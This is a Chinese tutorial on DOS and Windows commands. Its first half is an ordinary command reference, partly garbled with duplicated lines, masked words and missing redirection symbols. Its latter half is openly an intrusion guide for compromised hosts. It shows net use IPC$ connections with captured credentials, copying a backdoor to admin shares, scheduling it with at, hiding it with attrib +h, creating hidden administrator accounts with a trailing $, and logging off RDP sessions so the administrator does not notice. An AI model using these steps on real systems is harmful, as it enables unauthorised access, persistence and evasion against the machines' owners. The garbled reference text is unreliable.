4、入门DOS命令
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板winmsd-----系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup------- *** 管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕"讲述人"
ntm *** gr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
你要学的是MSDOS,还是windows的DOS命令啊!如果是windows的DOS命令,很简单。只要打开那个窗口,输入help就可以显示所以命令及功能。要知道某个命令的用法可虽然【命令】/?比如dir/?。可以自己学的。纯DOS下有好多命令与windows的命令差不多,可以相互通用的。
一、DIR 命令的格式:
dir [D:][PATH][NAME][[/A][:attrib]][/o:[sorted][/l][/c[h]
(1)dir /a:attrib 缺省包含所有文件(系统文件.隐含文件)
attrib[:][h/-h]只显示隐含文件或非隐含文件.
[r/-r]只显示只读文件或非只读文件
[s/-s]只显示系统文件或非系统文件
[a/-a]只显示要归档文件或非归档文件
(2)/o[:]sorted:缺省完全按字母顺序,子目录显示在文件之前
/o[n/-n]:按字母顺序或按文件名顺序/反向显示
[e/-e]:按扩展名字母顺序/反向显示
[d/-d]:按时间顺序/反向显示
[s/-s]:按大小从大到小或/反向显示
[g/-g]:按子目录先于文件或文件先于子目录
(3)/s 参数:对当前目录及其子目录中所有文件进行列表
列名:Dir /s/a/o:n c:\PRN
将c盘上的所有子目录和文件按隶属关系并根据子目录和文件字母顺序打印输出
(4)/B 参数:将只显示文件名与扩展名
(5)/L 参数:将全部用小写字母对文件或子目录进行列表
训练:
dir /a 列当前目录所有文件(含隐含及系统文件)
dir /ah 列隐含文件(包含子目录(隐含的) dir /a-h
dir /as 列系统文件 dir /a-s
dir /ad 列子目录 dir /a-d
dir /o 按字母顺序
dir /B 只显示文件名与扩展名
二、attrib [+r|-r] [+a|-a] [+s|-s] [+h|-h] [d: ] [name]
缺省 attrib name 显示文件的(文件)属性
attrib io.sys (或子目录)
shr c:\ io.sys 指定为系统(s) 隐含(h) 只读(r)文件
也可以attrib *.sys 显示扩展名为sys的文件属性
参数 [+r|-r] 将文件属性设置或解除 只读属性
[+a|-a] 将文件属性设置或解除 归档属性
[+h|-h] 将文件属性设置或解除 隐含属性 (尤其对子目录也起作用)
/s 参数 将当前及当前子目录下的所有文件均起作用
可以用来查找文件
例子:
attrib news86 列news86的文档属性
attrib +r report.txt 设置为只读 attrib -s -h record.txt
attrib +a a:*.*
attrib -a a:*.bak
xcopy a: b: /a 将A盘上的所有标志为"归档"属性的文件拷到B盘
xcopy a: b: /m 将A盘上的所有文件拷到B盘后并移去归档属性
三、cd 介绍: cd...返回上二级目录 "."代表当前目录 "."代表父目录
cd ..\..返回到上级目录的父目录(祖目录)
cd A:\ 将A盘的当前目录改为根目录
cd A:\xx 将A盘的当前目录改为子目录xx下
cd ..\98 先返回父目录,再进入父目录下的98子目录
cd ..返回到父目录
cd\98 进入根目录下的98子目录
四、copy [/y][/-y][/v][ /B]
copy /y 不加提示,对所有文件加以覆盖
/-y 加以提示,对所有文件 (yes或no提问 )
/v 拷贝以后加以校验
/B 按二进制进行显示
copy w1.wps con/b 可以将wps文件在屏幕上显示,而不必进入wps状态
copy ..\98 将父目录下的98子目录下的所有文件全拷到当前子目录
copy .\97 当当前目录下的97子目录下文件全部拷到当前目录
copy . c:\ 将当前目录下的所有文件拷到c盘根目录
. 意味着 *.* 文件
copy nul a.abc 将a.abc 文件清空(文件长度改为0)
copy 文件名+con 向文本文件中追加命令或内容
copy con 文件名 创建文本文件(F6存盘退出)
copy con prn 检测打印机的开关
五、xcopy命令
xcopy [source] [d:Date]
[/e] [/v] [/y]
xcopy [d:Date] xcopy a:b:\ /d:08/18/98/s/v 拷贝98.08.18年后的文件
xcopy
提示创建子目录
xcopy 连带子目录一起拷贝. 注意:若目标盘上不存在此子目录,而在目标
盘的结束符又不以"\"为结束,则将提示:
does destination specify a file name or directory name on the target
[f=file,d=directory]?
在目标盘上创建文件[按下]还是创建子目录[按下d] ?应选择d键
xcopy[/v] 带较验
*:(1) xcopy 不拷贝系统和隐含文件,应先予以修改属性再拷贝
xcopy [/y] 覆盖时是否有提示, /y 不带提示
若省略目标盘或子目录名,则拷贝到当前目录下
六、 del /p
加/p 可以在删除前是否提示
如del后加子目录名,则将子目录下所有文件(隐含.系统.只读文件除外)全删除,
加/p则可以确认.
七、undelete [name] /au
不加提示地将所有满足条件的文件恢复(能够恢复的),并将首字母置成"#",若已
存在,则按"# % 0 1 2-9 a-z"顺序加上.
如:undelete *.dbf/au 将扩展名为"dbf"的文件全恢复,并以"#"开头,作为文件
名, /list 仅列出可恢复的文件,而不恢复
undelete /load 将undelete装入内存
/unload 将undelete卸出内存
/s[drive]对指定驱动器进行监测管理
undelete/sc
将 undelete驻留内存,?并创建一个隐含的sentry 子目录对c盘删除的文件进行
管理 undelete/ds 恢复
相应恢复命令可以用undelete即可完整恢复出文件名(非常完整)
最常用undelete *.*
deltree /y [drive:path]
deltree 删除子目录及文件,尽管有些文件是系统文件或隐含文件
它可以带有通配符,带有通配符时,它将删除符合条件的文件及子目录
如:?undelete *.dbf/au 将扩展名为"dbf"的文件全恢复,并以"#"开头作为文件
名.
/list 仅列出可恢复的文件,而不作恢复操作.
undelete/load 将undelete 装入内存.
/unload将undelete 卸出内存.
/s[drive] 对指定的驱动器进行监视管理.
undelete/sc 将undelete 驻留内存,并创建一个隐含的sentry子目录对C盘删除
的文件进行管理.相应恢复命令可以用undelete/ds 即可完整恢复出文件名(很完善).
最常用的是undelete *.*
八、deltree /y [drive:path]
deltree 删除子目录及文件,尽管有些文件是系统或隐含的.
它可以带有通配符,这时它将删除符合条件的文件或子目录.
如:存在L1文件,L2子目录,L3文件,L4子目录
deltree L*.* 将删除以上所有的文件和子目录,但在删除前加以确认,若不删除,
可以输入"N".
/y 参数是在删除时不加以确认就进行操作的.
它删除的文件可以用undelete恢复,?但不能恢复子目录及其下的文件,可以用特
殊工具.如NORTON 8.0 等.
若提前使用了undelete/s,?则可以在sentry子目录下找到完整的文件,但名已经
改变了.
九、dos=high[|low[umb|noumb]]
dos=high,umb 则dos将自身装入高端内存(high)并能管理上位内存(umb).
noumb 则不管理上位内存.
在写入dos=high及umb 前应装入device=himem.sys
为了将程序或驱动程序装入上位内存,必须使用dos=umb,可省出大部分常规内存.
可以在config.sys的任何位置写上dos=high,umb
若显示hma not avoiable 或 load down low 则表明不能使用高端内存.
十、doskey 记录以前敲过的dos命令,可以用F7来显示,用"↑↓"来选择,用F9来输入
选择的命令号.
doskey/restall 重新装入一次,以前的命令行撤消.
doskey/history 显示内存中所有的命令,可以""显示到其它文件中,缩写"/H".
doskey dir=cls 则击入dir等同于cls一样.
doskey/macros 可显示所有的宏定义,可使用""重定义到文件中,可缩写"/M".
doskey dir= 可撤消对dir 的宏定义.
doskey p=dir$tdir*.exe/p$tdir c:\t$tdir c:\t$*
$t为命令的区分符,而$*为命令的结束符
doskey/insert(overstrike)?在重新输入命令时,对旧命令的修改是插入还是覆
盖状态(默认).
十一、emm386.exe
提供对扩展内存的管理,使应用程序象使用常规内存一样能够使用它.
常见的用法是 在config.sys 中
device=c:\dos\himem.sys
device=c:\dos\emm386.exe ram
d=64 将DMA 内存数量设置为64K
noems 提供对上位内存的访问,但不提供对扩展内存的访问.
应注意的是在windows中更好不要用它,因为windows本身有对扩展内存进行管理
的程序.应采用windows中的管理器.
十二、fc 命令 fc/b dt.dat dt2.datb (作二进制代码比较)
比较两个文件,一般用作存取进度,修改游戏存储文件用.
实际代码位置应加上0100 如:0000 05E4:00 67
实际用debug -e 修改时应加上0100 即 0000 06E4:00 67
后面加上重定向文件"P" 可以将比较结果输出到p文件中.
十三、format /q /u /s /n:sectors /f:size /c
/q参数:快速格式化,仅扫描文件分配表和根目录区,仅对格式化过的磁盘有效.
使用时应确保格式化过后没有增加新的坏道.
/u参数:无条件格式化,并且不保存原来盘上的信息,可以防止"unformat".
/s参数:格式化为系统盘,也可以使用"sys"命令.
/f:size size 可以为160 180 320 360 720 1200 1440 2800
/n:sector n可以为1 格式为单面盘,容量为160k 180k
可以为4 可以在5寸高密驱动器上格式化360k磁盘
可以为8 可以在5寸高密驱动器上进行8个扇区的格式化.
/c 重新测试坏扇区,缺省时如果一个扇区标记为"坏",以后格式时就不在从新测
试,仅作标记,使用"/C"时可以从新测试.
十四、unformat 命令
对用format 格式过,且未用"/u"参数的命令起作用,用它可以来重新修复已经损
坏的硬盘分区表,但对 *** 盘不起作用.
unformat drive:[/l][/test]
/l 显示每一个被unformat发现的文件和子目录,如果没有这个开关,只显示那些
破碎的文件和子目录,可以用ctrl+s 暂停,按任意键继续.
/test 仅作一个测试,不作实际的修复工作,作模拟过程.
/p 一边测试一边打印.
注:这种 *** 不能保证修复所有的文件,尤其是格式化后又添加过数据的磁盘.
恢复后的文件依次存放在subdir1....2....3等子目录中.
十五、interlnk 语法 interlnk g=e ,它可以通过串口或并口在两机间进行通讯.
将服务器端上的e驱动器映射为客户端的g驱动器,以后对客户端而言,所有对g的
操作都意味着对服务器的访问,取消映射的办法为interlnk g=
单独输入interlnk 则显示所有的映射情况.
注意:interlnk 必须在装入interlnk.exe 设备驱动程序才可以使用.
所用的驱动器符号与config.?sys中lastdrv.exe设置的数目有关.可以作一个一
端为25针,另一端为9针的串行线实现,具体接线方式如下:
5 - 7 2 - 15
3 - 2 3 - 13
7 - 4 4 - 12
6 - 6 5 - 10
3 - 3 6 - 11
8 - 5 15 - 2
4 - 20 13 - 3
9针 25针 12 - 4
10 - 5
11 - 6
25 - 25
25针 25针
十六、interlnk.exe 与intersvr.exe
interlnk.exe 重新定向对于客户驱动器或打印接口的请求到另外的服务器驱动
器或打印机.
语法:config.sys 中加入:
device=c:\dos\interlnk.exe [drive:n][/noprinter][com][lpt]
十七、memmaker[/batch][session][/swap:Drive]
使用memmaker能够优化内存配置,?并将配置写入autoexec.bat和config.sys中.
在这一过程中,需要重新启动几次机器.
十八、memitem memcolor memdefault submenu 菜单选项include
autoexec.bat 中如下: config.sys中如下:
path c:\dos;c:\ucdos [menu]
doskey menucolor=15,1(前景色15,背景色1)
\mouse\mouse menuitem=base_config,this is a base
goto %config% -选择项 menuitem=cced_config,this is a cced
选项 提示
:base_config menudefault=base_config,5
goto exit -跳出 缺省为base_config,延迟时间5秒
:cced_config [common]
c:\dos\ *** artdrv.exe /l device=c:\dos\himem.sys
goto exit 各项都包含的共同部分
:exit -结束 [base_config]
device=c:\dos\emm386.exe ram
dos=high,umb
[cced_config]
device=c:\dos\ *** artdrv.exe/double_buffer
include=base_config 包含base_config设置
可以根据计算机的在不同情况下的配置要求来选择.
十九、mscdex.exe 提供对光驱进行读写的程序
mscdex/d:Drive [/D:Drive][/e][/k][/l:letter]
典型:config.sys 中device=c:\cdrom\cdrom.sys /d:mscd000
autoexec.bat中 c:\dos\mscdex /d:mscd000 /l:g
配置了一个光驱,符号为g
参数/d:Drive1为光驱身份号,须与config.sys中的符号一致,可有多个
/d:mscd000 /d:mscd001
/e:使用扩展内存装入光驱驱动程序.
/s:使光驱在ms_net或windows是否设置为共享光驱
/V是否在加载时显示内存.
/L:letter 分配给光驱的盘符
/m:number 指定缓冲器的数目
应该注意的是:?如果用 *** artdrv.exe 加速对光驱的读写能力,应该在autoexec.
bat中将mscdex.?exe 写在 *** artdrv.exe 之前, *** artdrv.exe的使用可大幅提高
对驱动器的读写能力.
二十、msd的使用
使用msd 可以整体检查计算机配置及系统信息
包括:?驱动器参数,计算机cpu参数,内存大小参数,显示器类型,串.并口情况,以
及各个IRQ占用情况,据此可以分析新增设备是否与原来设备有冲突.
同时也可以通过分析内存驻留程序,判断内存中是否有病毒,有则标为"???".
二十一、prompt dos提示符
$q 等于号 $t 当前时间 $d 当前日期 $p 当前驱动器符号
$$ $号提示 $n当前驱动器 $g 大于号 $l小于号 $b 显示"|"管道号
$h 隐去提示符 $E显示"-"号
对于其它文字,则直接显示文本本身prompt ljw,则显示为ljw提示符
prompt 则仅显示当前驱动器号及大于号.
二十二、ramdrive.sys 使用内存当做虚拟盘来使用
应注意,所有数据都存在于内存中,应及时将其存到硬盘中,否则掉电后或者死机
后将丢失全部数据,优点是运行速度快,但不能在windows中使用.
示例:config.sys: device=c:\dos\ramdrive.sys /size[/e|a]
size为以k为单位的字节数,即建立的虚拟盘的大小.
/e或/a 都是使用扩展内存来建立虚拟盘,?加参数的前提是必须先加载内存管理
器himem.sys及emm386.exe.
二十三、subst 将一个驱动器与一个子目录联接
如:将对A:\l1\l2 子目录的请求映射为S盘,则输入
subst s: a:\l1\l2 即可
这样使用dir s:?等命令则显示的是a:\l1\l2子目录下的内容,其它copy del 一样
可以用subst s: d 来取消这种映射.
可以用subst 来显示各种联接情况
注意:?可以采用subst a: c:a 来建立一个对于A的读写盘.对于某些安装软件
来说,?必须使用A盘来安装,就可以使用先将所要安装的软件全部拷贝到C:a子
目录中,然后输入subst a: c:a,再转到A:,就可以进行软件的安装了.
二十四、mem /c /m /p /d 常规内存显示程序
/c显示所有内存驻留程序的占用情况,分为conventional常规内存和uppermemory
高端内存占用,并显示总的占用情况(常规 高端 保留 扩展内存)
/p分页显示,页间暂停
/m后加模块名 如:/m msdos 显示dos系统内存的占用.
/d对常规 高端 保留 扩展内存加以详细例表说明
通过分析,可以看出内存占用是否合理,以及各种程序是否正常加载,从而在此基
础上使用内存优化工具memmaker进行各种管理,同时又可以分析出一些程序死机
的原因,若有的地方显示"???",则可以断定内存中有病毒的存在,有利于发现及消灭.
二十五、各种管道工具的使用" "
将各种命令造成的输出或所需要的输入重新定向
如:Dir *.bat /bp 可以将dir *.bat 例出的文件名输出到p文件中.
timepp.bat
p文件中仅存在一个回车符,则可以将时间追加进p.bat文件中
" " 是将命令产生的输出重新定向,比如到文件或打印机中.
产生的内容将追加进文件中,则将原文件内容覆盖.
" " 是将命令所需要输入的内容重新定向.
如:timep 在批中可以是时间代码或回车符,可以以此改变时间.
需要说明的是 "prn "为打印机, "null"为空设备
con 为显示器
type p.batprn 可将p.bat打印出来.
copy null p 可将p文件删除掉
copy con p 可以在屏幕上编辑p文件,F6可以存盘退出
type ppp 完成p文件到pp 的复制
type p|more 可在屏满时暂停显示
二十六、move 命令
move [y/-y] filename1 filename2
将文件1移动到文件2处
如:move c:\dos\*.* c:\cced
将dos子目录下的所有文件全部移动到cced 子目录下
/y|-y参数在目标目录不存在需要创建时,是否出现提示
可以使用该命令修改子目录名称,如 move dos cced
将dos目录名改为cced
二十七、append 指定一些特殊数据文件的存放位置,如user.dat pe2.pro等一些非*.
exe *.com *.bat 文件
格式:append [:]终止以前存在的指定目录 append 显示指定情况
append [path] append c:\user 等
二十八、
call 在一个批处理命令中调用另外一个批处理文件
(1)不终止现有文件的运行,执行完掉用程序后立即返回.
(2)被调用批处理命令必须以bat 为扩展名
(3)调用批处理文件时,可以加上参数(%1-%9)以及环境变量如%baud%
(4)不能使用管道工具及重定向工具
二十九、device devicehigh loadhigh
device 将指定的设备驱动程序装入内存中
devicehigh将指定的设备驱动程序装入高端内存中
loadhigh 将指定的设备驱动程序装入高端内存中
三十、defrag 优化磁盘
legend(传奇) optimize(优化) elapse(逝去) fragment(碎片)
该命令执行对指定的盘进行优化处理(包括检查文件分配表,各文件状态,纠正错误),
在执行时,可按照文件名大小,时间,扩展名对文件进行排序.
大家在入侵时,一定会用到DOS命令的,它的功能非常的强大.今天我就对常用的DOS命令作个详细的解说.主要是给刚入门者和接触DOS命令少的朋友看的.下面我挑几个比较常用的给大家说说.
以windows2000为例,windows xp类同.
DIR
显示当前盘下的所有文件夹和文件.
比较常用的 *** 是,你上传一个后门或服务端(这儿比如名字叫systems.exe)到肉鸡的c:\winnt\system32下,你想看看有没有上传成功.可以用DIR命令看一下. 命令如下 :
DIR c:\winnt\system32\systems.exe
则会显示:
2004-05-24 20:06 194,762 systems.exe
1 个文件 194,762 字节
0 个目录 4,658,597,888 可用字节
如果你没有上传成功,则显示如下:
驱动器 C 中的卷没有标签。
卷的序列号是 6458-3DB8
c:\winnt\system32\的目录
找不到文件
CD
改变当前目录
具体看一下下面的命令:
C:\cd winnt //进入winnt文件夹
C:\winntcd system32 //进入system32 文件夹
C:\winnt\system32cd.. //回到上一级目录
C:\winntcd..
C:\
C:\d: //进入D盘
D:\e: //进入E盘
E:\
del和deltree
DEL:删除文件.
看下面的命令:
C:\del c:\xx\ww.txt //删除C盘的XX目录下的名叫WW的文件.
C:\
C:\del c:\xx\*.* //删除C盘的XX目录下所有文件
deltree
这个更具有破坏性,不但能删除所有文件,连文件夹也删除
C:\deltree c:\winnt //删除C盘下的winnt所有文件和文件夹.
这个大家要小心使用.
attrid
显示和更改文件或文件夹属性.
文件或文件夹的属性有 隐藏,用字母H表示. 只读,用R表示. 存档,用A表示. 系统,用S表示
改变一个文件或文件夹属性, " + " 表示增加, " - ",表示去掉某个属性.
平时我们都把后门或服务端到上传肉鸡的c:\winnt\system32下.在进入了肉鸡的CMD以后,为了更加的不让肉鸡管理员知道,我们可以把你上传的隐藏起来.比如还是上面的systems.exe
命令如下:
C:\attrid +h c:\winnt\system32\systems.exe //这样在system32下就找不到systems.exe
C:\attrid -h c:\winnt\system32\systems.exe //去掉systems.exe的隐藏属性
copy
复制一个或多个文件到其它目录
比如你把C盘下一个叫1.txt文件复制到D盘的vv文件夹下,
C:\copy c:\1.txt d:\vv\1.exe
比如你和肉鸡建立了IPC$连接(如何连接?以后会讲的),而且肉鸡开放了共享,这里比如开放了D盘.你可以把你C盘下的一个叫systems.exe的后门或服务端上传肉鸡的D盘下,命令如下:
C:\copy c:\systems.exe \\肉鸡IP\d$
type
显示文件内容
我现在在我的C盘的XX目录下新建一个叫hack.txt的文件,内容是一些台湾的IP
命令如下:
C:\type c:\xx\hack.txt
序号 开始IP地址 结束IP地址 国家/省/直辖市 城市/区县/组织
58 024.179.140.000 024.179.150.255 中国台湾省
80 061.013.000.000 061.013.255.255 中国台湾省
86 061.058.065.000 061.058.070.255 中国台湾省
87 061.059.160.000 061.059.255.255 中国台湾省
89 061.070.100.000 061.070.150.255 中国台湾省
1788 061.217.179.000 061.217.179.255 中国台湾省 台南市
1789 061.216.000.000 061.219.255.255 中国台湾省
1790 061.220.080.000 061.220.150.255 中国台湾省 台北市
1791 061.224.000.000 061.224.255.255 中国台湾省 台北市
1792 061.225.000.000 061.225.255.255 中国台湾省
3390 134.208.000.000 134.208.255.255 中国台湾省
3584 139.175.000.000 139.175.255.255 中国台湾省
3590 140.092.000.000 140.092.255.255 中国台湾省
3593 140.096.000.000 140.096.255.255 中国台湾省
3596 140.112.000.000 140.112.255.255 中国台湾省 台湾大学
C:\
它还有一个用法,就是在进入肉鸡的CMD以后,看看肉鸡用的是什么操作系统,命令如下,在我电脑操作的结果如下:
C:\type c:\boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft WindowsXP Professional"
/fastdetect
看出来没有?,我用的是XP系统.
这是一些我认为常用的命令,其它的还有rd,md等.你们有兴趣可以找资料看看.平进比较少用.
ping
这个是用的最多的命令.可是现在好像不灵光了.大多数网站和个人电脑用防火墙屏蔽了ping.大多数时候根本是P不通.基本命令:
ping ip
ping 网址
下面P的是本站:
C:\ping www.hf110.com
Pinging www.hf110.com [218.89.0.231] with 32 bytes of data:
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=66ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Ping statistics for 218.89.0.231:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 66ms, Maximum = 67ms, Average = 66ms
上面P出本站的IP是218.89.0.231,从TTL=116.大略看出使用的是windows操作系统.一般来说TTL值在128左右的是windows操作系统,值在225左右的,大多数是unix类系统.但是还有特殊情况,管理员可能会通过改注册表来修改TTL值.
net use
在得到肉鸡的用户名和密码这后,可以用这个命令做IPC$连接
net use \\肉鸡ip\ipc$ "密码" /user:"用户名"
连接成功后,上传后门或服务端,(比如叫systems.exe,在你的D盘下).
copy D:\systems.exe \\肉鸡ip\c$ //这里它要开放共享,你才能上传.否则无法上传成功.
net time \\肉鸡ip //看一下肉鸡的时间,是24小时制.比如这儿是下午3点10分.写作15:10
at \\肉鸡ip 15:12 systems.exe //在15:12分,运行systems.exe
在这儿,你上传的是反弹木马的话,可以等着它来连接你.其实在入侵过程中,有很多的偶然性,比如上面的,你可以IPC连接成功.但是并一定能够通过net time \\肉鸡ip ,看肉鸡时间.就算能看到时间吧,有时肉鸡的at服务并没有打开.就算打开了,但是后门或服务端不一定能够有机会运行,
可能被杀毒软件查杀.所以在入侵过程中,失败是常有的事.这个 *** 不行,可以另一种.
net user
查看用户或新建一个用户.
这是在我电脑上的截图
C:\net user
\\BILLGATES 的用户帐户
Guest guest1 HelpAssistant
SUPPORT_388945a0 yhkj
命令成功完成。
C:\
上面是我所有的用户.
现在我新建一个setwell的用户,密码是123456, 截图如下
C:\net user setwell 123456 /add
命令成功完成。
C:\net localgroup administrators setwell /add //这条命令是加setwell为管理员
命令成功完成。
接下来我们再net user ,载图如下
C:\net user
\\BILLGATES 的用户帐户
Guest guest1 HelpAssistant
setwell SUPPORT_388945a0 yhkj
命令成功完成。
建立的用户可以用net user命令看到,我们在用户后面加个$,可以小小的隐藏一下.这次建一个叫set的用户,截图如下:
C:\net user set$ 123456 /add
命令成功完成。
C:\net localgroup administrators set$ /add
命令成功完成。
C:\net user
\\BILLGATES 的用户帐户
Guest guest1 HelpAssistant
setwell SUPPORT_388945a0 yhkj
命令成功完成。
C:\
看到没有,我们没有看到刚才建立的用户set$,可以用这个命令看,net localgroup administrators ,这个命令的是显示所有的管理员,截图如下:
C:\net localgroup administrators
别名 administrators
注释 管理员对计算机/域有不受限制的完全访问权
成员
guest1
set$
setwell
yhkj
命令成功完成。
C:\
看到没有,我们看到set$这个用户了.
如果要删除用户用这个命令:
C:\net user setwell /delete
net start
1.启动某些服务
比如: net start telnet //启动telnet服务
2.查看当前启动了什么服务.看看我的电脑启动了什么服务:
C:\net start
已经启动以下 Windows 服务:
Automatic Updates
COM+ Event System
Cryptographic Services
DHCP Client
Distributed Link Tracking Client
DNS Client
Error Reporting Service
Event Log
Help and Support
IPSEC Services
Logical Disk Manager
Messenger
这只是一部分服务.
net stop
停止某些服务.站长今天也说到了.我不多了.
net share
查看默认共享.也就是查看这些共享C$ D$ e$ f$ admin$ ipc$,这是系统默认的.我的全部关了,我
到肉鸡上截张图吧.
C:\Documents and Settings\Administratornet share
D$ D:\ 默认共享
F$ F:\ 默认共享
ADMIN$ C:\WINNT 远程管理
C$ C:\ 默认共享
E$ E:\ 默认共享
命令成功完成。
C:\Documents and Settings\Administrator
这个肉鸡的IPC$共享竟然关了.
net view
也是查看共享,但不是上面的默认共享了,还是来张截图吧.也是肉鸡的,
C:\Documents and Settings\Administratornet view
服务器名称 注释
\\17
\\HMZ
\\ZGH
命令成功完成。
C:\Documents and Settings\Administrator
学DOS命令看起来有点烦,其实是挺容易学的.而且学好了,在入侵中,会起到举足轻重的作用.下次讲netstat 等命令.
netstat -an
使用这个命令可以察看到和本机的所有的连接.看一下在我电脑上的截图,
D:\netstat -an
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING
TCP 180.254.158.42:139 0.0.0.0:0 LISTENING
TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLISHED
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1035 *:*
UDP 0.0.0.0:1037 *:*
UDP 0.0.0.0:1134 *:*
UDP 0.0.0.0:1136 *:*
Proto Local Address Foreign Address State
协议 本地端口及IP地址 远程端口及IP地址 状态
LISTENING 监听状态 表示等待对方连接
ESTABLISHED 正在连接着.
TCP 协议是TCP
UDP 协议是UDP
TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLISHED
这个表示 利用tcp协议 本机ip(218.95.49.187通过端口:2935 和远程ip(218.89.0.231)端口:80连接
query
这个命令只有在开了3389端口(也不一定端口是3389,说不定改成别的端口了.严格讲应是开了远程终端服务)的机子,才能用上.我用1$的用户名上了一台3389机子,看一下截图:
c:\query user
USERNAME SESSIONNAME ID STATE
administrator console 0 运行中
1$ rdp-tcp#2 1 运行中
看到上面没有,管理员也在,如果你要退出的话,就用如下命令:
logoff ID 这儿是logoff 1.
这是正常退出的.说到退出,还有一个办法,就是在开始---关机---注销1$.如果你用另外的 *** 退出的话,那么肉鸡在关机时,会出现类如"有一个其它客人登录到这台服务器,如果你退出,对方的会话数据会丢失"一类的话.这样管理员就会发现了.
DOS
命令名 功 能
APPEND 将指定目录中的数据文件当做当前目录中的文件打开
ATTRIB 显示或改变文件的属性
BREAK 设置或清除扩展的[CTRL+C]检查
BUFFERS 在系统启动时,分配指定数量的磁盘缓冲区内存
CALL 在一个批处理程序中调用另一个批处理程序,而父批
处理程序不终止
CHCP 显示活动字符集(代码页)的序号
CHDIR(CD) 显示当前目录名或改变当前目录
CHKDSK 检查磁盘的状态并显示状态报告.另外还可修复磁盘错误
CHOICE 提示用户在一个批处理文件中进行选择
CLS 清屏幕
COMMAND 启动MS-DOS命令解释器的一个新的实例
COPY 将一个或多个文件复制到指定的位置
COUNTRY 允许MS-DOS实用显示时间,日期和货币的特定国家的约定;
确定字母排序的顺序;确定文件名中可用的字符 CTTY 修改用于控制系统的终端设备
DATE 显示日期在必要的情况下提示用户修改日期
DBLSPACE 压缩硬盘驱动器或软盘,并配置使用DOU-BLESPACE所压缩的驱动器
DBLSPACE/CHKDSK 检查一个压缩驱动器的结构有效性
DBLSPACE/COMPRESS压缩现有硬盘驱动器,软盘或其他可移动介质上的文件
DBLSPACE/CREATE 使用文压缩驱动器上的空余空间建立一个新的压缩驱动器
DBLSPACE/DEFRAGMENT重组所选的压缩驱动器
DBLSPACE/DELETE 删除所选择的压缩驱动器及其相关的压缩卷标文件
DBLSPACE/formAT 格式化所选择的压缩驱动器
DBLSPACE/INFO 显示所选驱动器的空余和已占用空间的信息,压缩卷标文件的名字
及其实际和估算的压缩率
DBLSPACE/LIST 列出并 简单描述所有系统的驱动器( *** 驱动器除外)
DBLSPACE/MOUNT 建立一个压缩卷标文件(CVF)和一个驱动器符之间的联系,以
便使用CVF所含的文件
DBLSPACE/UNMOUNT解除所选压缩卷标文件及其驱动器符之间的联系
DBLSPACE/RATIO 修改所选驱动器的估算压缩率
DBLSPACE/SIZE 增加或减少压缩驱动器的大小
DEBUG 启动Debug程序可测试并跟踪可执行文件
DEFRAG 重组磁盘文件,优化磁盘执行效率
DEL(Erase) 删除指定的文件
DELOLDOS 删除OLD--DOS.1目录及它所含的文件
DELTREE 删除一个目录和目录中的所有文件和子目录
DEVICE 将指定的设备驱动程序装入内存
DEVICEHIGH 将指定的设备驱动程序装入到上为内存区,从而为其他程序
留出了更多空余的常规内存
DIR 显示指定目录中的文件和目录清单
DIAKCOMP 比较两张软盘的内容
DISKCOPY 将一张软盘的所有内容复制到另一张软盘
DOS 指定MD-DOS与上位内存区保持联系,并将其自身的一部分装入到高
存区(HMA)
DOSKEY 可恢复MS-DOS命令,使用户可编辑命令行并建立和运行宏
DOSSHELL 它是一个MS-DOS图形界面
DRIVPARM 定义设备参数
ECHO 在程序运行时,显示或隐藏批处理程序中的文本内容.也表示命令回显
特性是非打开或关闭
EDIT 用于建立和编辑ASCII文本文件
EMM386 允许或不允许EMM386扩展内存支持具有80386或更高档处理器的计算
机
EXIT 从MS-DOS命令解释器(COMMAND.COM)中退出,并返回至启动命令解释器
的程序(如果该解释器存在)
EXPAND 解开一个压缩文件
FASTHELP 显示所有MS-DOS6.0命令清单,并给出每个命令的简要描述
FASTOPEN 减少了MS-DOS打开常用文件的时间
FC 比较两个文件并显示其不同之处
FCBS 指定MS-DOS可同时打开的文件控制块(FCB)的个数
FDISK 启动Fdisk程序,为MS-DOS配置使用的硬盘
FILES 指定MS-DOS一次能访问的文件数
FIND 查找文件(组)中指定的字符串
FOR 为一组文件中的每个文件运行一个指定的命令
formAT 格式化一个磁盘以便在MS-DOS中使用
GOTO 让MS-DOS转到用户指定标号所标明的批处理程序中的某一行
GRAPHICS 将允许MS-DOS打印显示在屏幕上信息的程序装入内存
HELP 启动MS-DOS help
